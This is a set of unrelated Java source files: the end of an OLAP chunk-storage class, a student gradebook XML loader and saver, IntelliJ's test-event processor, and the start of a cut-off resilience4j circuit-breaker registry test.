public void addBatch(Tenant tenant, String application, String table, OlapBatch batch) {
String store = application + "_" + table;
int size = batch.size();
if(size == 0) return;
int start = 0;
BatchWriter writer = new BatchWriter();
DBTransaction transaction = DBService.instance(tenant).startTransaction();
while(start < size) {
String dateStr = batch.get(start).getId();
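            // parseDate is called only to validate the record id's timestamp format; its result is discarded.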
Utils.parseDate(dateStr);
String day = dateStr.substring(0, 10);
int end = start + 1;
while(end < size) {
String nextDay = batch.get(end).getId().substring(0, 10);
if(!nextDay.equals(day)) break;
end++;
}
byte[] data = writer.writeChunk(batch, start, end - start);
String partition = day.replace("-", "");
String uuid = Utils.getUniqueId();
ChunkInfo chunkInfo = new ChunkInfo();
chunkInfo.set(partition, uuid, writer.getWriter());
transaction.addColumn(store, "partitions", partition, "");
transaction.addColumn(store, "partitions_" + partition, uuid, chunkInfo.getByteData());
for(BSTR field: writer.getFields()) {
transaction.addColumn(store, "fields", field.toString(), "");
}
transaction.addColumn(store, partition, uuid, data);
start = end;
}
DBService.instance(tenant).commit(transaction);
}
public void deleteOldSegments(Tenant tenant, String application, String table, long removeBeforeTimestamp) {
String store = application + "_" + table;
String partitionToCompare = getPartition(removeBeforeTimestamp);
List<String> partitions = getPartitions(tenant, application, table);
DBTransaction transaction = null;
for(String partition: partitions) {
if(partition.compareTo(partitionToCompare) >= 0) continue;
if(transaction == null) transaction = DBService.instance(tenant).startTransaction();
transaction.deleteColumn(store, "partitions", partition);
transaction.deleteRow(store, partition);
transaction.deleteRow(store, "partitions_" + partition);
}
if(transaction != null) DBService.instance(tenant).commit(transaction);
}
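    // Compacts a partition by merging small chunks: chunks with more than MIN_MERGE_DOCS events
    // are left alone, accumulated small chunks are rewritten as a single chunk once they approach
    // MAX_MERGE_DOCS events, and the original chunks are deleted in mergeChunks().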
public void mergePartition(Tenant tenant, String application, String table, String partition) {
final int MERGE_SEGMENTS = 8192;
final int MIN_MERGE_DOCS = 8192;
final int MAX_MERGE_DOCS = 65536;
String store = application + "_" + table;
List<ChunkInfo> infos = new ArrayList<ChunkInfo>(MERGE_SEGMENTS);
int totalSize = 0;
ChunkInfo info = new ChunkInfo();
ChunkMerger merger = null;
for(DColumn c: DBService.instance(tenant).getAllColumns(store, "partitions_" + partition)) {
info.set(partition, c.getName(), c.getRawValue());
int eventsCount = info.getEventsCount();
if(eventsCount > MIN_MERGE_DOCS) continue;
if(totalSize + eventsCount > MAX_MERGE_DOCS || infos.size() == MAX_MERGE_DOCS) {
if(merger == null) merger = new ChunkMerger(this, tenant, application, table);
mergeChunks(infos, merger);
infos.clear();
totalSize = 0;
}
infos.add(new ChunkInfo(info));
totalSize += eventsCount;
}
if(totalSize >= MIN_MERGE_DOCS) {
if(merger == null) merger = new ChunkMerger(this, tenant, application, table);
mergeChunks(infos, merger);
infos.clear();
totalSize = 0;
}
}
private void mergeChunks(List<ChunkInfo> infos, ChunkMerger merger) {
byte[] data = merger.mergeChunks(infos);
String store = merger.getApplication() + "_" + merger.getTable();
String partition = infos.get(0).getPartition();
String uuid = Utils.getUniqueId();
ChunkInfo chunkInfo = new ChunkInfo();
chunkInfo.set(partition, uuid, merger.getWriter());
DBTransaction transaction = DBService.instance(merger.getTenant()).startTransaction();
transaction.addColumn(store, "partitions_" + partition, uuid, chunkInfo.getByteData());
transaction.addColumn(store, partition, uuid, data);
for(ChunkInfo info: infos) {
transaction.deleteColumn(store, "partitions_" + partition, info.getChunkId());
transaction.deleteColumn(store, partition, info.getChunkId());
}
DBService.instance(merger.getTenant()).commit(transaction);
}
public List<String> getPartitions(Tenant tenant, String application, String table) {
String store = application + "_" + table;
List<String> partitions = new ArrayList<>();
for(DColumn c: DBService.instance(tenant).getAllColumns(store, "partitions")) {
partitions.add(c.getName());
}
return partitions;
}
public List<String> getPartitions(Tenant tenant, String application, String table, long minTimestamp, long maxTimestamp) {
long oneDayMillis = 1000 * 3600 * 24;
String minPartition = minTimestamp == 0 ? "" : getPartition(minTimestamp);
String maxPartition = maxTimestamp == Long.MAX_VALUE ? "z" : getPartition(maxTimestamp + oneDayMillis - 1);
return getPartitions(tenant, application, table, minPartition, maxPartition);
}
public List<String> getPartitions(Tenant tenant, String application, String table, String fromPartition, String toPartition) {
String store = application + "_" + table;
List<String> partitions = new ArrayList<>();
for(DColumn c: DBService.instance(tenant).getColumnSlice(store, "partitions", fromPartition, toPartition + '\0')) {
partitions.add(c.getName());
}
return partitions;
}
public void readChunk(Tenant tenant, String application, String table, ChunkInfo chunkInfo, ChunkReader chunkReader) {
byte[] data = readChunkData(tenant, application, table, chunkInfo);
if(data == null) throw new RuntimeException("Data was deleted");
chunkReader.read(data);
}
public byte[] readChunkData(Tenant tenant, String application, String table, ChunkInfo chunkInfo) {
String store = application + "_" + table;
DColumn column = DBService.instance(tenant).getColumn(store, chunkInfo.getPartition(), chunkInfo.getChunkId());
if(column == null) return null;
return column.getRawValue();
}
public List<byte[]> readChunks(Tenant tenant, String application, String table, List<ChunkInfo> infos) {
String store = application + "_" + table;
List<String> chunkIds = new ArrayList<>(infos.size());
for(ChunkInfo info: infos) chunkIds.add(info.getChunkId());
List<byte[]> data = new ArrayList<>(infos.size());
DRow row = DBService.instance(tenant).getRow(store, infos.get(0).getPartition());
for(DColumn c: row.getColumns(chunkIds, 100)) {
data.add(c.getRawValue());
}
if(data.size() != infos.size()) throw new RuntimeException("Error reading data");
return data;
}
public SearchResultList search(Tenant tenant, String application, String table, LogQuery logQuery) {
return Searcher.search(this, tenant, application, table, logQuery);
}
public AggregationResult aggregate(Tenant tenant, String application, String table, LogAggregate logAggregate) {
return Searcher.aggregate(this, tenant, application, table, logAggregate);
}
public ChunkIterable getChunks(Tenant tenant, String application, String table, String partition) {
String store = application + "_" + table;
return new ChunkIterable(tenant, store, partition);
}
}
|
|
/**
 * Loads from and saves to XML files.
*
* @author Brett M. Story
* @date 13 October, 2013
*/
package io;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.Writer;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import objects.*;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;
public class parseXML {
private static MyCourse course;
private static MyCourse loadCourseInfo(File file) {
course = new MyCourse(null);
try {
// Initial setup of document parser
DocumentBuilderFactory docBuilderFactory = DocumentBuilderFactory.newInstance();
DocumentBuilder docBuilder = docBuilderFactory.newDocumentBuilder();
Document doc = docBuilder.parse(file);
// normalize text representation
doc.getDocumentElement().normalize();
/* ------------------------------
* Section for courseName
* -------------------------------*/
NodeList courseNameList = doc.getElementsByTagName("courseName");
Node courseNameNode = courseNameList.item(0);
//Note: you must do .getFirstChild().getNodeValue() to return what's inside the tags
course.setName(courseNameNode.getFirstChild().getNodeValue());
/* ------------------------------
* Section for courseID/#/Section
* -------------------------------*/
NodeList courseIDList = doc.getElementsByTagName("courseID");
Node courseIDNode = courseIDList.item(0);
course.setCourseID(courseIDNode.getFirstChild().getNodeValue());
NodeList courseNumberList = doc.getElementsByTagName("courseNumber");
Node courseNumberNode = courseNumberList.item(0);
course.setCourseNumber(Integer.parseInt(courseNumberNode.getFirstChild().getNodeValue()));
NodeList sectionList = doc.getElementsByTagName("section");
Node sectionNode = sectionList.item(0);
course.setSection(sectionNode.getFirstChild().getNodeValue());
/* ------------------------------
* Section for building/roomNumber
* -------------------------------*/
NodeList buildingList = doc.getElementsByTagName("building");
Node buildingNode = buildingList.item(0);
Node buildingTextNode = buildingNode.getFirstChild();
if (buildingTextNode != null) {
course.setBuilding(buildingTextNode.getNodeValue());
}
NodeList roomIDList = doc.getElementsByTagName("roomID");
Node roomIDNode = roomIDList.item(0);
Node roomIDTextNode = roomIDNode.getFirstChild();
if (roomIDTextNode != null) {
course.setRoomID(roomIDTextNode.getNodeValue());
}
/* ------------------------------
* Section for meetingTime
* -------------------------------*/
NodeList meetingTimeList = doc.getElementsByTagName("meetingTime");
Node meetingTimeNode = meetingTimeList.item(0);
Node meetingTimeTextNode = meetingTimeNode.getFirstChild();
if (meetingTimeTextNode != null) {
course.setMeetingTime(meetingTimeTextNode.getNodeValue());
}
/* ------------------------------
* Section for semester
* -------------------------------*/
NodeList semesterList = doc.getElementsByTagName("semester");
Node semesterNode = semesterList.item(0);
			Node semesterTextNode = semesterNode.getFirstChild();
if (semesterTextNode != null) {
course.setSemester(semesterTextNode.getNodeValue());
}
/* ------------------------------
* Section for index
* -------------------------------*/
NodeList indexList = doc.getElementsByTagName("index");
Node assignmentNode = indexList.item(0);
Node categoryNode = indexList.item(1);
if (assignmentNode.getFirstChild().getNodeValue().equals("null") || categoryNode.getFirstChild().getNodeValue().equals("null")) {
course.setLastAssignmentIndex(null);
course.setLastCategoryIndex(null);
}
else {
course.setLastAssignmentIndex(Integer.parseInt(assignmentNode.getFirstChild().getNodeValue()));
course.setLastCategoryIndex(Integer.parseInt(categoryNode.getFirstChild().getNodeValue()));
}
//Beyond this point are all catches
}catch (SAXParseException err)
{
System.out.println("** Parsing error" + ", line " +
err.getLineNumber() + ", uri " + err.getSystemId());
System.out.println(" " + err.getMessage());
}catch (SAXException e) {
// TODO Auto-generated catch block
Exception x = e.getException();
((x == null) ? e: x).printStackTrace();
}catch (Throwable t) {
// TODO Auto-generated catch block
t.printStackTrace();
}
return course;
}
private static void loadStudentInfo(File file) {
try {
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
DefaultHandler handler = new DefaultHandler() {
String firstName = null;
String lastName = null;
String psuedoName = null;
boolean isFirstName = false;
boolean isLastName = false;
boolean isPsuedoName = false;
boolean isGhostName = false;
// A SAX callback method which finds the start of an XML element
public void startElement (String uri, String localName, String qName,
Attributes attributes) throws SAXException {
if (qName.equalsIgnoreCase("firstName")) {
isFirstName = true;
}
if (qName.equalsIgnoreCase("lastName")) {
isLastName = true;
}
if (qName.equalsIgnoreCase("psuedoName")) {
isPsuedoName = true;
}
if (qName.equalsIgnoreCase("ghostName")) {
isGhostName = true;
}
}
// A SAX callback method which finds the end of an XML element
public void endElement(String uri, String localName,
String qName) throws SAXException {
// adds a student to course when it reaches </student>
if (qName.equalsIgnoreCase("student")) {
course.addStudentXML(firstName, lastName, psuedoName);
}
}
// A SAX callback method which contains all the characters in an element
public void characters(char ch[], int start, int length)
throws SAXException {
//If the element is <name>
if (isFirstName) {
firstName = new String(ch, start, length);
isFirstName = false; // must declare name false for next search
}
//If the element is <name>
if (isLastName) {
lastName = new String(ch, start, length);
isLastName = false; // must declare name false for next search
}
//If the element is <psuedoName>
if (isPsuedoName) {
psuedoName = new String(ch, start, length);
isPsuedoName = false;
}
if (isGhostName) {
course.addGhostStudentXML(new String(ch, start, length));
isGhostName = false;
}
}
};
saxParser.parse(file, handler);
} catch (Exception e) {
e.printStackTrace();
}
}
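	// Grades inside each <assignment> are read in document order: the first entries belong to
	// regular students (by index) and the remaining ones to ghost students, mirroring the order
	// in which saveXML() writes them.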
private static void loadAssignmentInfo(File file) {
try {
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
DefaultHandler handler = new DefaultHandler()
{
String assignmentName;
int assignmentWorth;
String currentCategoryName;
int currentCategoryIndex = 0;
boolean isCategoryName = false;
boolean isAssignmentName = false;
boolean isWorth = false;
boolean isGrade = false;
int studentIndex = 0;
int totalStudents = course.getNumberOfStudents();
// A SAX callback method which finds the start of an XML element
public void startElement (String uri, String localName, String qName,
Attributes attributes) throws SAXException {
if (qName.equalsIgnoreCase("categoryName")) {
isCategoryName = true;
}
if (qName.equalsIgnoreCase("assignmentName")) {
isAssignmentName = true;
}
if (qName.equalsIgnoreCase("worth")) {
isWorth = true;
}
if (qName.equalsIgnoreCase("grade")) {
isGrade = true;
}
}
// A SAX callback method which finds the end of an XML element
public void endElement(String uri, String localName,
String qName) throws SAXException {
if (qName.equalsIgnoreCase("assignment")) {
studentIndex = 0;
}
}
// A SAX callback method which contains all the characters in an element
public void characters(char ch[], int start, int length)
throws SAXException {
if (isCategoryName) {
currentCategoryName = new String(ch, start, length);
course.addAssignmentCategory(currentCategoryName);
currentCategoryIndex = course.getAssignmentCategoryIndex(currentCategoryName);
isCategoryName = false;
}
if (isAssignmentName) {
assignmentName = new String(ch, start, length);
isAssignmentName = false;
}
if (isWorth) {
assignmentWorth = Integer.parseInt(new String(ch, start, length));
course.getAssignmentCategory(currentCategoryIndex).addAssignment(assignmentName, assignmentWorth);
isWorth = false;
}
if (isGrade) {
AssignmentCategory currentCategory = course.getAssignmentCategory(currentCategoryIndex);
Assignment currentAssignment = currentCategory.getAssignment(currentCategory.getAssignmentIndex(assignmentName));
String gradeValue = new String(ch, start, length);
String pseudoName = null;
boolean student = false;
if (studentIndex < totalStudents) {
pseudoName = course.getStudent(studentIndex).getPseudoName();
student = true;
}
else {
pseudoName = course.getGhostStudent(studentIndex - totalStudents).getPseudoName();
}
if (gradeValue.equals("null") || gradeValue.equals("")) {
currentAssignment.setGrade(pseudoName, null, student);
}
else {
currentAssignment.setGrade(pseudoName, Integer.parseInt(gradeValue), student);
}
isGrade = false;
studentIndex ++;
}
}
};
saxParser.parse(file, handler);
} catch (Exception e) {
e.printStackTrace();
}
}
public static MyCourse loadXML(File file) {
course = loadCourseInfo(file);
loadStudentInfo(file);
loadAssignmentInfo(file);
return course;
}
public static void saveXML(MyCourse tmpCourse) {
String fileDir = "gradebooks" + File.separator + tmpCourse.getIdentifier() + ".xml";
File file = new File(fileDir);
if (file.exists())
file.delete();
try {
file.createNewFile();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
Writer writer = null;
try {
writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(file), "utf-8"));
//Add header of XML file
writer.write("<class id=\""+file.toString()+"\">\n");
//FIXME use non-OS-specific newlines
//Add general course information to file
writer.write("\t<courseName>" + tmpCourse.getName() + "</courseName>\n");
writer.write("\t<courseID>" + tmpCourse.getCourseID() + "</courseID>\n");
writer.write("\t<courseNumber>" + tmpCourse.getCourseNumber() + "</courseNumber>\n");
writer.write("\t<section>" + tmpCourse.getSection() + "</section>\n");
writer.write("\t<building>" + tmpCourse.getBuilding() + "</building>\n");
writer.write("\t<roomID>" + tmpCourse.getRoomID() + "</roomID>\n");
writer.write("\t<meetingTime>" + tmpCourse.getMeetingTime() + "</meetingTime>\n");
writer.write("\t<semester>" + tmpCourse.getSemester() + "</semester>\n");
if (tmpCourse.getLastAssignmentIndex() != null && tmpCourse.getLastCategoryIndex() != null
&& tmpCourse.getLastCategoryIndex() < tmpCourse.getNumberOfAssignmentCategories()
&& tmpCourse.getLastAssignmentIndex() < tmpCourse.getCategories().get(tmpCourse.getLastCategoryIndex()).getNumberOfAssignments()) {
writer.write("\t<index>" + tmpCourse.getLastAssignmentIndex() + "</index>\n");
writer.write("\t<index>" + tmpCourse.getLastCategoryIndex() + "</index>\n\n");
}
else {
writer.write("\t<index>null</index>\n");
writer.write("\t<index>null</index>\n\n");
}
//Add student information
for (int i = 0; i < tmpCourse.getNumberOfStudents(); i++) {
writer.write("\t<student>\n");
writer.write("\t\t<firstName>" + tmpCourse.getStudent(i).getFirstName() + "</firstName>\n");
writer.write("\t\t<lastName>" + tmpCourse.getStudent(i).getLastName() + "</lastName>\n");
writer.write("\t\t<psuedoName>" + tmpCourse.getStudent(i).getPseudoName() + "</psuedoName>\n");
writer.write("\t</student>\n");
}
writer.write("\t<!-- Ghost Students -->\n");
//Add ghost students
for (int i = 0; i <tmpCourse.getNumberOfGhostStudents(); i++) {
writer.write("\t<ghostStudent>\n");
writer.write("\t\t<ghostName>" + tmpCourse.getGhostStudent(i).getPseudoName() + "</ghostName>\n");
writer.write("\t</ghostStudent>\n");
}
//Add assignment information
for (int i = 0; i < tmpCourse.getNumberOfAssignmentCategories(); i++) {
writer.write("\t<category>\n");
writer.write("\t\t<categoryName>" + tmpCourse.getAssignmentCategory(i).getName() + "</categoryName>\n");
for (int j = 0; j < tmpCourse.getAssignmentCategory(i).getNumberOfAssignments(); j++) {
writer.write("\t\t<assignment>\n");
writer.write("\t\t\t<assignmentName>" + tmpCourse.getAssignmentCategory(i).getAssignment(j).getName() + "</assignmentName>\n");
writer.write("\t\t\t<worth>" + tmpCourse.getAssignmentCategory(i).getAssignment(j).getWorth() + "</worth>\n");
for (int k = 0; k < tmpCourse.getNumberOfStudents(); k++) {
writer.write("\t\t\t<grade id=\"" + tmpCourse.getStudent(k).getFullName() + "\">" +
tmpCourse.getAssignmentCategory(i).getAssignment(j).getGrade(tmpCourse.getStudent(k).getPseudoName()) + "</grade>\n");
}
writer.write("\t\t\t<!-- Ghost Students -->\n");
for (int k = 0; k < tmpCourse.getNumberOfGhostStudents(); k++) {
writer.write("\t\t\t<grade id=\"" + tmpCourse.getGhostStudent(k).getPseudoName() + "\">" +
tmpCourse.getAssignmentCategory(i).getAssignment(j).getGrade(tmpCourse.getGhostStudent(k).getPseudoName()) + "</grade>\n");
}
writer.write("\t\t</assignment>\n");
}
writer.write("\t</category>\n");
}
writer.write("</class>");
} catch (IOException e){
System.out.println(e);
} finally {
			if (writer != null) {
				try { writer.close(); } catch (IOException e) { System.out.println(e); }
			}
}
}
public static Boolean archiveCourse(MyCourse tmpCourse) {
String fileDir = "gradebooks" + File.separator + tmpCourse.getIdentifier() + ".xml";
String desiredDir = "gradebooks" + File.separator + "archive" + File.separator + tmpCourse.getIdentifier() + ".xml";
File desired = new File (desiredDir);
if (desired.exists())
desired.delete();
try {
File file = new File(fileDir);
if (file.renameTo(desired))
return true;
else
return false;
} catch(Exception e) {
e.printStackTrace();
}
return false;
}
/*
public static void main(String argv[]) {
course = loadXML(new File("structure.xml"));
course.removeStudent(7);
saveXML(course, new File("output.xml"));
}*/
}
|
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.execution.testframework.sm.runner;
import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil;
import com.intellij.execution.testframework.sm.runner.events.*;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.application.Application;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Condition;
import com.intellij.openapi.util.Conditions;
import com.intellij.openapi.util.Key;
import com.intellij.util.Processor;
import com.intellij.util.containers.TransferToEDTQueue;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
/**
 * Processes events of a test runner in general text-based form.
 * <p/>
 * Test names should be unique across all suites - e.g. a name can consist of a suite name and the name of a test method.
 *
 * @author Roman Chernyatchik
*/
public abstract class GeneralTestEventsProcessor implements Disposable {
private static final Logger LOG = Logger.getInstance(GeneralTestEventsProcessor.class.getName());
protected final SMTRunnerEventsListener myEventPublisher;
private final String myTestFrameworkName;
private final Project myProject;
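  // Events are funneled through this queue so they are replayed on the EDT in batches
  // instead of posting one invokeLater call per event.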
private TransferToEDTQueue<Runnable> myTransferToEDTQueue =
new TransferToEDTQueue<Runnable>("SM queue", new Processor<Runnable>() {
@Override
public boolean process(Runnable runnable) {
runnable.run();
return true;
}
}, getDisposedCondition(), 300);
protected List<SMTRunnerEventsListener> myListenerAdapters = new ArrayList<SMTRunnerEventsListener>();
public GeneralTestEventsProcessor(Project project, @NotNull String testFrameworkName) {
myProject = project;
myEventPublisher = project.getMessageBus().syncPublisher(SMTRunnerEventsListener.TEST_STATUS);
myTestFrameworkName = testFrameworkName;
}
// tree construction events
public void onRootPresentationAdded(String rootName, String comment, String rootLocation) {}
public void onSuiteTreeNodeAdded(String testName, String locationHint) { }
public void onSuiteTreeStarted(String suiteName, String locationHint) { }
public void onSuiteTreeEnded(String suiteName) { }
public void onBuildTreeEnded() { }
// progress events
public abstract void onStartTesting();
protected void fireOnTestingStarted(SMTestProxy.SMRootTestProxy node) {
myEventPublisher.onTestingStarted(node);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestingStarted(node);
}
}
public abstract void onTestsCountInSuite(final int count);
protected void fireOnTestsCountInSuite(int count) {
myEventPublisher.onTestsCountInSuite(count);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestsCountInSuite(count);
}
}
public abstract void onTestStarted(@NotNull TestStartedEvent testStartedEvent);
protected void fireOnTestStarted(SMTestProxy testProxy) {
myEventPublisher.onTestStarted(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestStarted(testProxy);
}
}
public abstract void onTestFinished(@NotNull TestFinishedEvent testFinishedEvent);
protected void fireOnTestFinished(SMTestProxy testProxy) {
myEventPublisher.onTestFinished(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestFinished(testProxy);
}
}
public abstract void onTestFailure(@NotNull TestFailedEvent testFailedEvent);
protected void fireOnTestFailed(SMTestProxy testProxy) {
myEventPublisher.onTestFailed(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestFailed(testProxy);
}
}
public abstract void onTestIgnored(@NotNull TestIgnoredEvent testIgnoredEvent);
protected void fireOnTestIgnored(SMTestProxy testProxy) {
myEventPublisher.onTestIgnored(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestIgnored(testProxy);
}
}
public abstract void onTestOutput(@NotNull TestOutputEvent testOutputEvent);
public abstract void onSuiteStarted(@NotNull TestSuiteStartedEvent suiteStartedEvent);
protected void fireOnSuiteStarted(SMTestProxy newSuite) {
myEventPublisher.onSuiteStarted(newSuite);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onSuiteStarted(newSuite);
}
}
public abstract void onSuiteFinished(@NotNull TestSuiteFinishedEvent suiteFinishedEvent);
protected void fireOnSuiteFinished(SMTestProxy mySuite) {
myEventPublisher.onSuiteFinished(mySuite);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onSuiteFinished(mySuite);
}
}
public abstract void onUncapturedOutput(@NotNull String text, Key outputType);
public abstract void onError(@NotNull String localizedMessage, @Nullable String stackTrace, boolean isCritical);
protected static void fireOnTestsReporterAttached(SMTestProxy.SMRootTestProxy rootNode) {
rootNode.setTestsReporterAttached();
}
public abstract void onFinishTesting();
protected void fireOnTestingFinished(SMTestProxy.SMRootTestProxy root) {
myEventPublisher.onTestingFinished(root);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestingFinished(root);
}
}
// custom progress statistics
/**
* @param categoryName If isn't empty then progress statistics will use only custom start/failed events.
* If name is null statistics will be switched to normal mode
* @param testCount 0 will be considered as unknown tests number
*/
public void onCustomProgressTestsCategory(@Nullable final String categoryName,
final int testCount) {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestsCategory(categoryName, testCount);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestsCategory(categoryName, testCount);
}
}
});
}
public void onCustomProgressTestStarted() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestStarted();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestStarted();
}
}
});
}
public void onCustomProgressTestFinished() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestFinished();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestFinished();
}
}
});
}
public void onCustomProgressTestFailed() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestFailed();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestFailed();
}
}
});
}
// workflow/service methods
public abstract void onTestsReporterAttached();
public abstract void setLocator(@NotNull SMTestLocator locator);
public void addEventsListener(@NotNull SMTRunnerEventsListener listener) {
myListenerAdapters.add(listener);
}
public abstract void setPrinterProvider(@NotNull TestProxyPrinterProvider printerProvider);
@Override
public void dispose() {
if (!ApplicationManager.getApplication().isUnitTestMode()) {
UIUtil.invokeAndWaitIfNeeded(new Runnable() {
@Override
public void run() {
myTransferToEDTQueue.drain();
}
});
}
}
protected void disconnectListeners() {
myListenerAdapters.clear();
}
public Condition getDisposedCondition() {
return Conditions.alwaysFalse();
}
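  // Dispatch strategy: unit-test mode defers to UIUtil.invokeLaterIfNeeded; headless mode or
  // calls already on the EDT run the runnable immediately; everything else is queued for
  // batched execution on the EDT.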
public void addToInvokeLater(final Runnable runnable) {
final Application application = ApplicationManager.getApplication();
if (application.isUnitTestMode()) {
UIUtil.invokeLaterIfNeeded(runnable);
}
else if (application.isHeadlessEnvironment() || SwingUtilities.isEventDispatchThread()) {
runnable.run();
}
else {
myTransferToEDTQueue.offer(runnable);
}
}
public void stopEventProcessing() {
UIUtil.invokeLaterIfNeeded(new Runnable() {
@Override
public void run() {
myTransferToEDTQueue.drain();
}
});
}
protected static <T> boolean isTreeComplete(Collection<T> runningTests, SMTestProxy.SMRootTestProxy rootNode) {
if (!runningTests.isEmpty()) {
return false;
}
List<? extends SMTestProxy> children = rootNode.getChildren();
for (SMTestProxy child : children) {
if (!child.isFinal() || child.wasTerminated()) {
return false;
}
}
return true;
}
protected void logProblem(final String msg) {
logProblem(LOG, msg, myTestFrameworkName);
}
protected void logProblem(String msg, boolean throwError) {
logProblem(LOG, msg, throwError, myTestFrameworkName);
}
public static String getTFrameworkPrefix(final String testFrameworkName) {
return "[" + testFrameworkName + "]: ";
}
public static void logProblem(final Logger log, final String msg, final String testFrameworkName) {
logProblem(log, msg, SMTestRunnerConnectionUtil.isInDebugMode(), testFrameworkName);
}
public static void logProblem(final Logger log, final String msg, boolean throwError, final String testFrameworkName) {
final String text = getTFrameworkPrefix(testFrameworkName) + msg;
if (throwError) {
log.error(text);
}
else {
log.warn(text);
}
}
}
|
|
/*
*
* Copyright 2016 Robert Winkler
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*
*/
package io.github.resilience4j.circuitbreaker;
import io.github.resilience4j.core.EventProcessor;
import io.github.resilience4j.core.Registry;
import io.github.resilience4j.core.registry.*;
import org.junit.Test;
import java.util.*;
import static org.assertj.core.api.Assertions.assertThatThrownBy;
import static org.assertj.core.api.BDDAssertions.assertThat;
public class CircuitBreakerRegistryTest {
private static Optional<EventProcessor<?>> getEventProcessor(
Registry.EventPublisher<CircuitBreaker> eventPublisher) {
if (eventPublisher instanceof EventProcessor<?>) {
return Optional.of((EventProcessor<?>) eventPublisher);
}
return Optional.empty();
}
@Test
public void shouldInitRegistryTags() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
CircuitBreakerRegistry registry = CircuitBreakerRegistry.of(circuitBreakerConfigs,new NoOpCircuitBreakerEventConsumer(),Map.of("Tag1Key","Tag1Value"));
assertThat(registry.getTags()).isNotEmpty();
assertThat(registry.getTags()).containsOnly(Map.entry("Tag1Key","Tag1Value"));
}
@Test
public void shouldReturnTheCorrectName() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker).isNotNull();
assertThat(circuitBreaker.getName()).isEqualTo("testName");
}
@Test
public void shouldBeTheSameCircuitBreaker() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker).isSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(1);
}
@Test
public void shouldBeNotTheSameCircuitBreaker() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void noTagsByDefault() {
CircuitBreaker circuitBreaker = CircuitBreakerRegistry.ofDefaults()
.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).hasSize(0);
}
@Test
public void tagsOfRegistryAddedToInstance() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
